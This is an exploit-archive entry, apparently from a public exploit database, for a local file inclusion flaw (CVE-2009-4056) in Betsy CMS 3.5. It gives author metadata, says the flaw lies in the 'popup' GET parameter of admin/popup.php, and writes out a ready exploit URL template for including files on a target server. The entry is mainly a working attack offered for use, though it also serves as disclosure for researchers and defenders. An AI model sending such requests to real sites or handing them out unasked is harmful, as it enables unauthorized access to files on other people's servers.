Betsy CMS versions 3.5 - Local File Inclusion

Author: MizoZ
type: webapps
platform: php
port: 
date_added: 2009-11-20  
date_updated:   
verified: 1  
codes: CVE-2009-4056;OSVDB-60467  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 10189.txt  

/*

Author          : MizoZ [from MA]
Group           : EvilWay
Email           : mizozx[at]gmail[dot]com

Greetz          : Zuka !!

Good luck DZ :)

*/

The vulnerability is in the file admin/popup.php on the get $_GET['popup']

Exploit :

[HOST]/[PATH]/admin/popup.php?popup=[IT INCLUDE FROM admin/]